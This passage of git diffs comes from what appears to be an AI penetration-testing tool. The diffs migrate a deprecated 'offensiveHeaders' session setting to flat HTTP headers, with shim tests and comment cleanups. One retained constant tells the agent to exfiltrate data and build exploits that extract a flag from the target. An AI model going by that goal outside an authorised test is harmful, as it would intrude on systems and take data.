- * `fetch` from bypassing the resolver.
- */
-
 export type HeaderRecord = Record<string, string>;
 
-/**
- * Source layer of an effective header. Order matches precedence: later
- * layers win on key collision in the resolver.
- *
- * See INV-precedence-deterministic and INV-precedence-explicit-request.
- */
+/** Source layer of an effective header. Later layers win on collision. */
 export type Layer = "global" | "session" | "credential" | "request";
 
 export type EffectiveHeader = {
@@ -24,10 +9,6 @@ export type EffectiveHeader = {
   readonly source: Layer;
 };
 
-/**
- * Lower-cased substring patterns that mark a header as sensitive.
- * Sensitive headers are masked in display.
- */
 const SENSITIVE_PATTERNS = [
   "authorization",
   "cookie",
@@ -42,11 +23,7 @@ export function isSensitiveHeaderName(name: string): boolean {
   return SENSITIVE_PATTERNS.some((p) => lower.includes(p));
 }
 
-/**
- * Render a header value safely for display. Sensitive values are masked
- * to the last four characters (`****abc1`). Pass `showSecrets` to
- * unmask for explicit user requests (`/headers list --show`).
- */
+/** Mask sensitive values to `****<last4>` unless `showSecrets` is true. */
 export function renderHeaderValue(
   name: string,
   value: string,

--- a/src/core/session/deprecated-headers-shim.test.ts
+++ b/src/core/session/deprecated-headers-shim.test.ts
@@ -70,6 +70,20 @@ describe("migrateLegacySessionData — offensiveHeaders shim", () => {
     expect("offensiveHeaders" in cfg).toBe(false);
   });
 
+  it("mode 'none' overrides a populated headers field (INV-mode-none)", () => {
+    // Regression: previously the `oh.headers` merge ran unconditionally,
+    // so `{ mode: "none", headers: { ... } }` produced the headers
+    // rather than the documented empty result.
+    const result = migrateLegacySessionData(
+      wrap({
+        offensiveHeaders: { mode: "none", headers: { "X-A": "1" } },
+      }),
+    );
+    const cfg = configOf(result);
+    expect(cfg.headers).toEqual({});
+    expect("offensiveHeaders" in cfg).toBe(false);
+  });
+
   it("flat headers win when both fields are present", () => {
     const result = migrateLegacySessionData(
       wrap({

--- a/src/core/session/deprecated-headers-shim.test.ts
+++ b/src/core/session/deprecated-headers-shim.test.ts
@@ -1,0 +1,114 @@
+/**
+ * Contract tests for the deprecated `offensiveHeaders` shim.
+ *
+ * The shim only exists so downstream `pensarai/console` agents
+ * (which still write to `SessionConfig.offensiveHeaders` and import
+ * `OffensiveHeadersConfig`) keep typechecking while they migrate
+ * to the flat `headers` shape.
+ *
+ * These tests pin the boundary contract: regardless of which
+ * deprecated mode a caller passes, the persisted/returned config
+ * has `headers: Record<string, string>` only and never both fields.
+ *
+ * Delete this file when the shim is removed.
+ */
+
+import { describe, expect, it } from "vitest";
+import {
+  migrateLegacySessionData,
+  type OffensiveHeadersConfig,
+} from "./index";
+
+// Compile-time: the deprecated type is still exported. If this line
+// fails to compile, console's `import { OffensiveHeadersConfig }`
+// breaks again.
+const _typeExportCheck: OffensiveHeadersConfig = {
+  mode: "custom",
+  headers: { "X-A": "1" },
+};
+void _typeExportCheck;
+
+function wrap(config: Record<string, unknown>) {
+  return {
+    id: "test",
+    targets: ["https://example.com"],
+    config,
+  };
+}
+
+function configOf(result: unknown): Record<string, unknown> {
+  return (result as { config: Record<string, unknown> }).config;
+}
+
+describe("migrateLegacySessionData — offensiveHeaders shim", () => {
+  it("mode 'custom' → flat headers + strips deprecated field", () => {
+    const result = migrateLegacySessionData(
+      wrap({
+        offensiveHeaders: { mode: "custom", headers: { "X-A": "1" } },
+      }),
+    );
+    const cfg = configOf(result);
+    expect(cfg.headers).toEqual({ "X-A": "1" });
+    expect("offensiveHeaders" in cfg).toBe(false);
+  });
+
+  it("mode 'default' seeds the User-Agent default", () => {
+    const result = migrateLegacySessionData(
+      wrap({ offensiveHeaders: { mode: "default", headers: { "X-A": "1" } } }),
+    );
+    const cfg = configOf(result);
+    expect(cfg.headers).toEqual({
+      "User-Agent": "pensar-apex",
+      "X-A": "1",
+    });
+    expect("offensiveHeaders" in cfg).toBe(false);
+  });
+
+  it("mode 'none' yields empty headers", () => {
+    const result = migrateLegacySessionData(
+      wrap({ offensiveHeaders: { mode: "none" } }),
+    );
+    const cfg = configOf(result);
+    expect(cfg.headers).toEqual({});
+    expect("offensiveHeaders" in cfg).toBe(false);
+  });
+
+  it("flat headers win when both fields are present", () => {
+    const result = migrateLegacySessionData(
+      wrap({
+        headers: { "X-Flat": "wins" },
+        offensiveHeaders: { mode: "custom", headers: { "X-Deprecated": "1" } },
+      }),
+    );
+    const cfg = configOf(result);
+    expect(cfg.headers).toEqual({ "X-Flat": "wins" });
+    expect("offensiveHeaders" in cfg).toBe(false);
+  });
+
+  it("no-op when neither field is present", () => {
+    const input = wrap({ mode: "auto" });
+    const result = migrateLegacySessionData(input);
+    // identity — nothing to migrate, no spread cost
+    expect(result).toBe(input);
+  });
+
+  it("preserves unrelated config fields", () => {
+    const result = migrateLegacySessionData(
+      wrap({
+        mode: "auto",
+        outcomeGuidance: "do the thing",
+        offensiveHeaders: { mode: "custom", headers: { "X-A": "1" } },
+      }),
+    );
+    const cfg = configOf(result);
+    expect(cfg.mode).toBe("auto");
+    expect(cfg.outcomeGuidance).toBe("do the thing");
+    expect(cfg.headers).toEqual({ "X-A": "1" });
+  });
+
+  it("safely returns input for non-object payloads", () => {
+    expect(migrateLegacySessionData(null)).toBeNull();
+    expect(migrateLegacySessionData("not an object")).toBe("not an object");
+    expect(migrateLegacySessionData(undefined)).toBeUndefined();
+  });
+});

--- a/src/core/session/deprecated-headers-shim.test.ts
+++ b/src/core/session/deprecated-headers-shim.test.ts
@@ -1,24 +1,12 @@
-/**
- * Contract tests for the deprecated `offensiveHeaders` shim.
- *
- * The shim only exists so downstream `pensarai/console` agents
- * (which still write to `SessionConfig.offensiveHeaders` and import
- * `OffensiveHeadersConfig`) keep typechecking while they migrate
- * to the flat `headers` shape.
- *
- * These tests pin the boundary contract: regardless of which
- * deprecated mode a caller passes, the persisted/returned config
- * has `headers: Record<string, string>` only and never both fields.
- *
- * Delete this file when the shim is removed.
- */
+// Contract tests for the deprecated `offensiveHeaders` shim. Pin the
+// boundary: regardless of which deprecated mode a caller passes, the
+// persisted config has `headers` only and never both fields. Delete
+// this file when the shim is removed.
 
 import { describe, expect, it } from "vitest";
 import { migrateLegacySessionData, type OffensiveHeadersConfig } from "./index";
 
-// Compile-time: the deprecated type is still exported. If this line
-// fails to compile, console's `import { OffensiveHeadersConfig }`
-// breaks again.
+// Compile-time guard that `OffensiveHeadersConfig` is still exported.
 const _typeExportCheck: OffensiveHeadersConfig = {
   mode: "custom",
   headers: { "X-A": "1" },
@@ -70,10 +58,8 @@ describe("migrateLegacySessionData — offensiveHeaders shim", () => {
     expect("offensiveHeaders" in cfg).toBe(false);
   });
 
-  it("mode 'none' overrides a populated headers field (INV-mode-none)", () => {
-    // Regression: previously the `oh.headers` merge ran unconditionally,
-    // so `{ mode: "none", headers: { ... } }` produced the headers
-    // rather than the documented empty result.
+  it("mode 'none' overrides a populated headers field", () => {
+    // Regression: `oh.headers` merge previously ran unconditionally.
     const result = migrateLegacySessionData(
       wrap({
         offensiveHeaders: { mode: "none", headers: { "X-A": "1" } },

--- a/src/core/session/deprecated-headers-shim.test.ts
+++ b/src/core/session/deprecated-headers-shim.test.ts
@@ -14,10 +14,7 @@
  */
 
 import { describe, expect, it } from "vitest";
-import {
-  migrateLegacySessionData,
-  type OffensiveHeadersConfig,
-} from "./index";
+import { migrateLegacySessionData, type OffensiveHeadersConfig } from "./index";
 
 // Compile-time: the deprecated type is still exported. If this line
 // fails to compile, console's `import { OffensiveHeadersConfig }`

--- a/src/core/session/index.ts
+++ b/src/core/session/index.ts
@@ -442,7 +442,7 @@ function normalizeDeprecatedHeaders<T extends { offensiveHeaders?: unknown }>(
   config: T | undefined,
 ): Omit<T, "offensiveHeaders"> | undefined {
   if (!config) return config;
-  if (config.offensiveHeaders === undefined) {
+  if (config.offensiveHeaders == null) {
     const { offensiveHeaders: _drop, ...rest } = config;
     return rest;
   }

--- a/src/core/session/index.ts
+++ b/src/core/session/index.ts
@@ -31,11 +31,7 @@ export const EXFIL_OUTCOME_GUIDANCE =
   "Exfiltrate data to extract the flag value. " +
   "Create proof-of-concept exploits that successfully extract the flag from the target system.";
 
-/**
- * Default seed headers used when neither the caller nor the global
- * config supplies any. Matches the long-standing default User-Agent so
- * existing sessions still identify themselves the same way.
- */
+// Fallback when neither the caller nor global config supplies headers.
 const DEFAULT_HEADER_RECORD: Record<string, string> = {
   "User-Agent": "pensar-apex",
 };
@@ -72,33 +68,12 @@ const ScopeConstraintsObject = z.object({
 
 type ScopeConstraints = z.infer<typeof ScopeConstraintsObject>;
 
-/**
- * Schema for the session's effective custom HTTP headers.
- *
- * Replaces the old `OffensiveHeadersConfig { mode, headers? }` shape
- * (boolean soup with hidden magic for `mode: "default"`). The header
- * map IS the state — empty record means "send no custom headers", a
- * populated record means "send these on every in-scope target call".
- *
- * Migration of legacy `offensiveHeaders` is performed in
- * `migrateLegacySessionData` when reading session.json AND in
- * `normalizeDeprecatedHeaders` when callers (e.g. console agents)
- * pass it through `sessions.create`.
- */
+// The header map IS the state — empty record means "send no custom headers".
 const SessionHeadersRecord = z.record(z.string(), z.string());
 
-/**
- * Deprecated nested-mode shape for legacy callers (downstream
- * `pensarai/console` agents still write to this field). New code
- * should pass flat `SessionConfig.headers` instead.
- *
- * Kept on the schema so console can migrate at its own pace; the
- * field is normalized to `headers` at every input boundary and is
- * never persisted in session.json. Remove this shim once console
- * `packages/agents/{blackbox,whitebox}-pentest/*` no longer
- * references `offensiveHeaders` / `OffensiveHeadersConfig` — see
- * follow-up issue in the apex tracker.
- */
+// Legacy shape kept only so downstream `pensarai/console` agents keep
+// typechecking. Normalized into `headers` at every input boundary and
+// stripped before persistence.
 const OffensiveHeadersConfigObject = z.object({
   mode: z.enum(["none", "default", "custom"]).optional(),
   headers: SessionHeadersRecord.optional(),
@@ -218,24 +193,12 @@ function resolveSmtpConfig(explicit?: SmtpConfig): SmtpConfig | undefined {
 
 const SessionConfigObject = z.object({
   /**
-   * Effective custom HTTP headers for outbound target requests. Merged
-   * from global `config.defaultHeaders` at session create time
-   * (snapshot semantics — INV-snapshot-stability) and mutated
-   * thereafter by CLI flags, `/headers` slash, dialog, or wizard.
-   *
-   * Read exclusively via the resolver in `src/core/http/targetHeaders.ts`
-   * — never directly by tools (INV-single-source).
+   * Custom HTTP headers for outbound target requests. Snapshotted from
+   * `config.defaultHeaders` at create time; read via the resolver in
+   * `src/core/http/targetHeaders.ts`, not directly by tools.
    */
   headers: SessionHeadersRecord.optional(),
-  /**
-   * @deprecated Pass `headers` instead. Translated by
-   * `normalizeDeprecatedHeaders` at every input boundary (sessions.create,
-   * agent createSession) and stripped before persistence — stored
-   * session.json never contains both fields.
-   *
-   * Kept only so downstream `pensarai/console` agents continue to
-   * typecheck during their migration window.
-   */
+  /** @deprecated Pass flat `headers` instead. Normalized at input boundaries. */
   offensiveHeaders: OffensiveHeadersConfigObject.optional(),
   sessionType: z.enum(["web-app"]).optional(),
   mode: z.enum(["auto", "driver", "operator"]).optional(),
@@ -423,21 +386,11 @@ async function getExecution(
   }
 }
 
-/**
- * Translate a deprecated `offensiveHeaders: { mode, headers? }` into
- * flat `headers: Record<string, string>` on a bare config and strip
- * the deprecated field. Pure / non-mutating.
- *
- * Rules (single source of truth, shared with `migrateLegacySessionData`):
- *  - flat `headers` always wins if both are present
- *  - mode "default" → seeds DEFAULT_HEADER_RECORD then layers explicit
- *  - mode "none" / "custom" → uses explicit headers only (or `{}`)
- *
- * Called at every input boundary where a SessionConfig enters apex
- * from outside: `sessions.create`, and (via cast) when loading legacy
- * session.json files. Tools never see `offensiveHeaders` because it
- * is stripped before persistence.
- */
+// Translate the deprecated `offensiveHeaders: { mode, headers? }` into
+// flat `headers` and strip the legacy field. Pure / non-mutating.
+//
+// Precedence: flat `headers` wins if present; mode "default" seeds the
+// default record; mode "none" yields `{}` (must override `oh.headers`).
 function normalizeDeprecatedHeaders<T extends { offensiveHeaders?: unknown }>(
   config: T | undefined,
 ): Omit<T, "offensiveHeaders"> | undefined {
@@ -457,10 +410,6 @@ function normalizeDeprecatedHeaders<T extends { offensiveHeaders?: unknown }>(
     mode?: string;
     headers?: Record<string, string>;
   };
-  // INV-mode-none: `mode: "none"` means "send no custom headers" and
-  // must override any populated `oh.headers`. Without this short
-  // circuit, `{ mode: "none", headers: { "X-A": "1" } }` would
-  // incorrectly resolve to `{ "X-A": "1" }` instead of `{}`.
   if (oh.mode === "none") {
     return { ...restWithHeaders, headers: {} };
   }
@@ -470,11 +419,8 @@ function normalizeDeprecatedHeaders<T extends { offensiveHeaders?: unknown }>(
   return { ...restWithHeaders, headers };
 }
 
-/**
- * Migrate a legacy `session.json` (with `offensiveHeaders: { mode, headers? }`)
- * into the new flat shape. Non-destructive: returns a new object; the
- * on-disk file is only rewritten the next time the session is saved.
- */
+// Migrate a legacy session.json into the flat-headers shape. The on-disk
+// file is only rewritten on the next save.
 export function migrateLegacySessionData(input: unknown): unknown {
   if (!input || typeof input !== "object") return input;
   const root = input as Record<string, unknown>;
@@ -534,10 +480,7 @@ export interface CreateInputProps {
 export async function create(input: CreateInputProps) {
   const name = input.name ?? generateRandomName();
 
-  // Normalize any deprecated `offensiveHeaders` from external callers
-  // (downstream `pensarai/console` agents) into the flat `headers` shape
-  // before anything else touches the config. From here on, internal code
-  // only ever sees `headers` — see normalizeDeprecatedHeaders.
+  // Internal code only sees flat `headers` from here on.
   const normalizedConfig = normalizeDeprecatedHeaders(input.config) as
     | SessionConfig
     | undefined;
@@ -571,11 +514,8 @@ export async function create(input: CreateInputProps) {
 
   const smtpConfig = resolveSmtpConfig(normalizedConfig?.smtpConfig);
 
-  // Resolve effective headers for the new session. Caller-supplied
-  // `config.headers` wins verbatim (CLI flag / wizard already merged
-  // global if they wanted to). Otherwise we snapshot the current global
-  // defaultHeaders so the session is "locked" at create time
-  // (INV-snapshot-stability).
+  // Caller `headers` wins verbatim; otherwise snapshot the current global
+  // defaultHeaders so the session is locked at create time.
   let snapshotHeaders: Record<string, string>;
   if (normalizedConfig?.headers !== undefined) {
     snapshotHeaders = { ...normalizedConfig.headers };
@@ -992,14 +932,7 @@ export async function updateOperatorSettings(
 // Custom HTTP Headers Update
 // ============================================================================
 
-/**
- * Replace the session's effective custom HTTP headers in one atomic
- * write. Pass an empty record to clear all headers.
- *
- * Subsequent mutations to the global default headers do NOT propagate
- * into already-running sessions — the session keeps the snapshot it
- * was created with.
- */
+/** Replace the session's custom HTTP headers. Pass `{}` to clear. */
 export async function updateSessionHeaders(
   sessionId: string,
   headers: Record<string, string>,

--- a/src/core/session/index.ts
+++ b/src/core/session/index.ts
@@ -81,9 +81,33 @@ type ScopeConstraints = z.infer<typeof ScopeConstraintsObject>;
  * populated record means "send these on every in-scope target call".
  *
  * Migration of legacy `offensiveHeaders` is performed in
- * `migrateLegacySessionData` when reading session.json.
+ * `migrateLegacySessionData` when reading session.json AND in
+ * `normalizeDeprecatedHeaders` when callers (e.g. console agents)
+ * pass it through `sessions.create`.
  */
 const SessionHeadersRecord = z.record(z.string(), z.string());
+
+/**
+ * Deprecated nested-mode shape for legacy callers (downstream
+ * `pensarai/console` agents still write to this field). New code
+ * should pass flat `SessionConfig.headers` instead.
+ *
+ * Kept on the schema so console can migrate at its own pace; the
+ * field is normalized to `headers` at every input boundary and is
+ * never persisted in session.json. Remove this shim once console
+ * `packages/agents/{blackbox,whitebox}-pentest/*` no longer
+ * references `offensiveHeaders` / `OffensiveHeadersConfig` — see
+ * follow-up issue in the apex tracker.
+ */
+const OffensiveHeadersConfigObject = z.object({
+  mode: z.enum(["none", "default", "custom"]).optional(),
+  headers: SessionHeadersRecord.optional(),
+});
+
+/** @deprecated Pass flat `SessionConfig.headers: Record<string, string>` directly. */
+export type OffensiveHeadersConfig = z.infer<
+  typeof OffensiveHeadersConfigObject
+>;
 
 const OperatorSettingsObject = z.object({
   initialMode: z.enum(["plan", "manual", "auto"]).default("manual"),
@@ -203,6 +227,16 @@ const SessionConfigObject = z.object({
    * — never directly by tools (INV-single-source).
    */
   headers: SessionHeadersRecord.optional(),
+  /**
+   * @deprecated Pass `headers` instead. Translated by
+   * `normalizeDeprecatedHeaders` at every input boundary (sessions.create,
+   * agent createSession) and stripped before persistence — stored
+   * session.json never contains both fields.
+   *
+   * Kept only so downstream `pensarai/console` agents continue to
+   * typecheck during their migration window.
+   */
+  offensiveHeaders: OffensiveHeadersConfigObject.optional(),
   sessionType: z.enum(["web-app"]).optional(),
   mode: z.enum(["auto", "driver", "operator"]).optional(),
   outcomeGuidance: z.string().optional(),
@@ -390,48 +424,58 @@ async function getExecution(
 }
 
 /**
+ * Translate a deprecated `offensiveHeaders: { mode, headers? }` into
+ * flat `headers: Record<string, string>` on a bare config and strip
+ * the deprecated field. Pure / non-mutating.
+ *
+ * Rules (single source of truth, shared with `migrateLegacySessionData`):
+ *  - flat `headers` always wins if both are present
+ *  - mode "default" → seeds DEFAULT_HEADER_RECORD then layers explicit
+ *  - mode "none" / "custom" → uses explicit headers only (or `{}`)
+ *
+ * Called at every input boundary where a SessionConfig enters apex
+ * from outside: `sessions.create`, and (via cast) when loading legacy
+ * session.json files. Tools never see `offensiveHeaders` because it
+ * is stripped before persistence.
+ */
+function normalizeDeprecatedHeaders<T extends { offensiveHeaders?: unknown }>(
+  config: T | undefined,
+): Omit<T, "offensiveHeaders"> | undefined {
+  if (!config) return config;
+  if (config.offensiveHeaders === undefined) {
+    const { offensiveHeaders: _drop, ...rest } = config;
+    return rest;
+  }
+  const { offensiveHeaders, ...rest } = config;
+  const restWithHeaders = rest as Omit<T, "offensiveHeaders"> & {
+    headers?: Record<string, string>;
+  };
+  if (restWithHeaders.headers !== undefined) {
+    return restWithHeaders;
+  }
+  const oh = offensiveHeaders as {
+    mode?: string;
+    headers?: Record<string, string>;
+  };
+  let headers: Record<string, string> = {};
+  if (oh.mode === "default") headers = { ...DEFAULT_HEADER_RECORD };
+  if (oh.headers) headers = { ...headers, ...oh.headers };
+  return { ...restWithHeaders, headers };
+}
+
+/**
  * Migrate a legacy `session.json` (with `offensiveHeaders: { mode, headers? }`)
- * into the new flat shape (`headers: Record<string, string>`).
- *
- * Rules:
- *  - mode "none"   → headers: {}
- *  - mode "default" → headers: { "User-Agent": "pensar-apex", ...explicit }
- *  - mode "custom"  → headers: { ...explicit }
- *
- * If both `offensiveHeaders` and `headers` are present (transitional
- * file), `headers` wins. If neither is present, the field is left
- * absent — callers default appropriately.
- *
- * Non-destructive: returns a new object; the on-disk file is only
- * rewritten the next time the session is saved.
+ * into the new flat shape. Non-destructive: returns a new object; the
+ * on-disk file is only rewritten the next time the session is saved.
  */
 export function migrateLegacySessionData(input: unknown): unknown {
   if (!input || typeof input !== "object") return input;
   const root = input as Record<string, unknown>;
   const config = root.config;
   if (!config || typeof config !== "object") return input;
-
   const cfg = config as Record<string, unknown>;
-  if ("headers" in cfg) return input;
   if (!("offensiveHeaders" in cfg)) return input;
-
-  const oh = cfg.offensiveHeaders as
-    | { mode?: string; headers?: Record<string, string> }
-    | undefined;
-  let headers: Record<string, string> = {};
-  if (oh) {
-    if (oh.mode === "default") headers = { ...DEFAULT_HEADER_RECORD };
-    if (oh.headers) headers = { ...headers, ...oh.headers };
-  }
-
-  const { offensiveHeaders: _drop, ...restConfig } = cfg;
-  return {
-    ...root,
-    config: {
-      ...restConfig,
-      headers,
-    },
-  };
+  return { ...root, config: normalizeDeprecatedHeaders(cfg) };
 }
 
 // ============================================================================
@@ -483,6 +527,14 @@ export interface CreateInputProps {
 export async function create(input: CreateInputProps) {
   const name = input.name ?? generateRandomName();
 
+  // Normalize any deprecated `offensiveHeaders` from external callers
+  // (downstream `pensarai/console` agents) into the flat `headers` shape
+  // before anything else touches the config. From here on, internal code
+  // only ever sees `headers` — see normalizeDeprecatedHeaders.
+  const normalizedConfig = normalizeDeprecatedHeaders(input.config) as
+    | SessionConfig
+    | undefined;
+
   const id =
     `${input.prefix ? input.prefix : ""}` +
     Identifier.descending("session", input.id);
@@ -494,23 +546,23 @@ export async function create(input: CreateInputProps) {
   const pocsPath = path.join(rootPath, "pocs");
 
   const rateLimiter = new RateLimiter({
-    requestsPerSecond: input.config?.requestsPerSecond,
+    requestsPerSecond: normalizedConfig?.requestsPerSecond,
   });
 
   // Auto-create CredentialManager when authCredentials are provided.
   // Secrets live only in memory — they are never serialized to disk.
   let credentialManager: CredentialManager | undefined;
-  if (input.config?.authCredentials) {
+  if (normalizedConfig?.authCredentials) {
     credentialManager = new CredentialManager();
-    const creds = Array.isArray(input.config.authCredentials)
-      ? input.config.authCredentials
-      : [input.config.authCredentials];
+    const creds = Array.isArray(normalizedConfig.authCredentials)
+      ? normalizedConfig.authCredentials
+      : [normalizedConfig.authCredentials];
     for (const cred of creds) {
       credentialManager.addFromAuthCredentials(cred);
     }
   }
 
-  const smtpConfig = resolveSmtpConfig(input.config?.smtpConfig);
+  const smtpConfig = resolveSmtpConfig(normalizedConfig?.smtpConfig);
 
   // Resolve effective headers for the new session. Caller-supplied
   // `config.headers` wins verbatim (CLI flag / wizard already merged
@@ -518,8 +570,8 @@ export async function create(input: CreateInputProps) {
   // defaultHeaders so the session is "locked" at create time
   // (INV-snapshot-stability).
   let snapshotHeaders: Record<string, string>;
-  if (input.config?.headers !== undefined) {
-    snapshotHeaders = { ...input.config.headers };
+  if (normalizedConfig?.headers !== undefined) {
+    snapshotHeaders = { ...normalizedConfig.headers };
   } else {
     const { config: appConfig } = await import("../config");
     const cfg = await appConfig.get();
@@ -538,12 +590,12 @@ export async function create(input: CreateInputProps) {
       updated: Date.now(),
     },
     config: {
-      ...input.config,
-      mode: input.config?.mode || "auto",
+      ...normalizedConfig,
+      mode: normalizedConfig?.mode || "auto",
       headers: snapshotHeaders,
       outcomeGuidance:
-        input.config?.outcomeGuidance ||
-        (input.config?.exfilMode
+        normalizedConfig?.outcomeGuidance ||
+        (normalizedConfig?.exfilMode
           ? EXFIL_OUTCOME_GUIDANCE
           : DEFAULT_OUTCOME_GUIDANCE),
       smtpConfig,

--- a/src/core/session/index.ts
+++ b/src/core/session/index.ts
@@ -32,9 +32,11 @@ export const EXFIL_OUTCOME_GUIDANCE =
   "Create proof-of-concept exploits that successfully extract the flag from the target system.";
 
 /**
- * Default headers for pensar-apex
+ * Default seed headers used when neither the caller nor the global
+ * config supplies any. Matches the long-standing default User-Agent so
+ * existing sessions still identify themselves the same way.
  */
-const DEFAULT_OFFENSIVE_HEADERS: Record<string, string> = {
+const DEFAULT_HEADER_RECORD: Record<string, string> = {
   "User-Agent": "pensar-apex",
 };
 
@@ -70,14 +72,18 @@ const ScopeConstraintsObject = z.object({
 
 type ScopeConstraints = z.infer<typeof ScopeConstraintsObject>;
 
-const OffensiveHeadersConfigObject = z.object({
-  mode: z.enum(["none", "default", "custom"]),
-  headers: z.record(z.string(), z.string()).optional(),
-});
-
-export type OffensiveHeadersConfig = z.infer<
-  typeof OffensiveHeadersConfigObject
->;
+/**
+ * Schema for the session's effective custom HTTP headers.
+ *
+ * Replaces the old `OffensiveHeadersConfig { mode, headers? }` shape
+ * (boolean soup with hidden magic for `mode: "default"`). The header
+ * map IS the state — empty record means "send no custom headers", a
+ * populated record means "send these on every in-scope target call".
+ *
+ * Migration of legacy `offensiveHeaders` is performed in
+ * `migrateLegacySessionData` when reading session.json.
+ */
+const SessionHeadersRecord = z.record(z.string(), z.string());
 
 const OperatorSettingsObject = z.object({
   initialMode: z.enum(["plan", "manual", "auto"]).default("manual"),
@@ -187,7 +193,16 @@ function resolveSmtpConfig(explicit?: SmtpConfig): SmtpConfig | undefined {
 }
 
 const SessionConfigObject = z.object({
-  offensiveHeaders: OffensiveHeadersConfigObject.optional(),
+  /**
+   * Effective custom HTTP headers for outbound target requests. Merged
+   * from global `config.defaultHeaders` at session create time
+   * (snapshot semantics — INV-snapshot-stability) and mutated
+   * thereafter by CLI flags, `/headers` slash, dialog, or wizard.
+   *
+   * Read exclusively via the resolver in `src/core/http/targetHeaders.ts`
+   * — never directly by tools (INV-single-source).
+   */
+  headers: SessionHeadersRecord.optional(),
   sessionType: z.enum(["web-app"]).optional(),
   mode: z.enum(["auto", "driver", "operator"]).optional(),
   outcomeGuidance: z.string().optional(),
@@ -375,26 +390,48 @@ async function getExecution(
 }
 
 /**
- * Resolve offensive headers based on session config
+ * Migrate a legacy `session.json` (with `offensiveHeaders: { mode, headers? }`)
+ * into the new flat shape (`headers: Record<string, string>`).
+ *
+ * Rules:
+ *  - mode "none"   → headers: {}
+ *  - mode "default" → headers: { "User-Agent": "pensar-apex", ...explicit }
+ *  - mode "custom"  → headers: { ...explicit }
+ *
+ * If both `offensiveHeaders` and `headers` are present (transitional
+ * file), `headers` wins. If neither is present, the field is left
+ * absent — callers default appropriately.
+ *
+ * Non-destructive: returns a new object; the on-disk file is only
+ * rewritten the next time the session is saved.
  */
-function getOffensiveHeaders(
-  session: SessionInfo,
-): Record<string, string> | undefined {
-  const config = session.config?.offensiveHeaders;
+export function migrateLegacySessionData(input: unknown): unknown {
+  if (!input || typeof input !== "object") return input;
+  const root = input as Record<string, unknown>;
+  const config = root.config;
+  if (!config || typeof config !== "object") return input;
 
-  if (!config || config.mode === "none") {
-    return undefined;
+  const cfg = config as Record<string, unknown>;
+  if ("headers" in cfg) return input;
+  if (!("offensiveHeaders" in cfg)) return input;
+
+  const oh = cfg.offensiveHeaders as
+    | { mode?: string; headers?: Record<string, string> }
+    | undefined;
+  let headers: Record<string, string> = {};
+  if (oh) {
+    if (oh.mode === "default") headers = { ...DEFAULT_HEADER_RECORD };
+    if (oh.headers) headers = { ...headers, ...oh.headers };
   }
 
-  if (config.mode === "default") {
-    return DEFAULT_OFFENSIVE_HEADERS;
-  }
-
-  if (config.mode === "custom" && config.headers) {
-    return config.headers;
-  }
-
-  return undefined;
+  const { offensiveHeaders: _drop, ...restConfig } = cfg;
+  return {
+    ...root,
+    config: {
+      ...restConfig,
+      headers,
+    },
+  };
 }
 
 // ============================================================================
@@ -475,6 +512,22 @@ export async function create(input: CreateInputProps) {
 
   const smtpConfig = resolveSmtpConfig(input.config?.smtpConfig);
 
+  // Resolve effective headers for the new session. Caller-supplied
+  // `config.headers` wins verbatim (CLI flag / wizard already merged
+  // global if they wanted to). Otherwise we snapshot the current global
+  // defaultHeaders so the session is "locked" at create time
+  // (INV-snapshot-stability).
+  let snapshotHeaders: Record<string, string>;
+  if (input.config?.headers !== undefined) {
+    snapshotHeaders = { ...input.config.headers };
+  } else {
+    const { config: appConfig } = await import("../config");
+    const cfg = await appConfig.get();
+    snapshotHeaders = cfg.defaultHeaders
+      ? { ...cfg.defaultHeaders }
+      : { ...DEFAULT_HEADER_RECORD };
+  }
+
   const result: SessionInfo = {
     id: id,
     version: getCurrentVersion(),
@@ -487,12 +540,7 @@ export async function create(input: CreateInputProps) {
     config: {
       ...input.config,
       mode: input.config?.mode || "auto",
-      offensiveHeaders: input.config?.offensiveHeaders || {
-        mode: "default",
-        headers: {
-          "User-Agent": "pensar-apex",
-        },
-      },
+      headers: snapshotHeaders,
       outcomeGuidance:
         input.config?.outcomeGuidance ||
         (input.config?.exfilMode
@@ -536,7 +584,8 @@ export async function create(input: CreateInputProps) {
 }
 
 export const get = async (id: string) => {
-  const read = await Storage.read<SessionInfo>(["sessions", id, "session"]);
+  const raw = await Storage.read<unknown>(["sessions", id, "session"]);
+  const read = migrateLegacySessionData(raw) as SessionInfo;
 
   // Reconstruct RateLimiter instance (it gets serialized as plain object)
   // This ensures the session has a proper RateLimiter with methods
@@ -881,6 +930,30 @@ export async function updateOperatorSettings(
 }
 
 // ============================================================================
+// Custom HTTP Headers Update
+// ============================================================================
+
+/**
+ * Replace the session's effective custom HTTP headers in one atomic
+ * write. Pass an empty record to clear all headers.
+ *
+ * Subsequent mutations to the global default headers do NOT propagate
+ * into already-running sessions — the session keeps the snapshot it
+ * was created with.
+ */
+export async function updateSessionHeaders(
+  sessionId: string,
+  headers: Record<string, string>,
+): Promise<SessionInfo> {
+  return await update(sessionId, (session) => {
+    if (!session.config) {
+      session.config = {};
+    }
+    session.config.headers = { ...headers };
+  });
+}
+
+// ============================================================================
 // Toolset State Management
 // ============================================================================
 
@@ -934,4 +1007,5 @@ export const sessions = {
   hasOperatorState,
   getResumeMessages,
   updateOperatorSettings,
+  updateSessionHeaders,
 };

--- a/src/core/session/index.ts
+++ b/src/core/session/index.ts
@@ -457,6 +457,13 @@ function normalizeDeprecatedHeaders<T extends { offensiveHeaders?: unknown }>(
     mode?: string;
     headers?: Record<string, string>;
   };
+  // INV-mode-none: `mode: "none"` means "send no custom headers" and
+  // must override any populated `oh.headers`. Without this short
+  // circuit, `{ mode: "none", headers: { "X-A": "1" } }` would
+  // incorrectly resolve to `{ "X-A": "1" }` instead of `{}`.
+  if (oh.mode === "none") {
+    return { ...restWithHeaders, headers: {} };
+  }
   let headers: Record<string, string> = {};
   if (oh.mode === "default") headers = { ...DEFAULT_HEADER_RECORD };
   if (oh.headers) headers = { ...headers, ...oh.headers };

--- a/src/tests/browserCookies.test.ts
+++ b/src/tests/browserCookies.test.ts
@@ -28,7 +28,7 @@ describe.skip("Browser Cookie Extraction", () => {
         return;
       }
 
-      session = new PlaywrightMcpSession(true);
+      session = new PlaywrightMcpSession({ headless: true });
       await session.initialize();
 
       // Navigate to login — wait for AuthKit redirect

--- a/src/tui/command-registry.ts
+++ b/src/tui/command-registry.ts
@@ -7,7 +7,24 @@ import {
   combinePromptParts,
   hasEnoughFlagsToSkipWizard,
   parseWebFlags,
+  type WebCommandFlags,
 } from "./utils/command-flags";
+
+/**
+ * Translate the wizard/CLI header flags into a SessionConfig.headers value.
+ *
+ * - `--headers none`             → `{}` (explicitly suppresses defaults)
+ * - `--headers custom` + `--header`s → that record
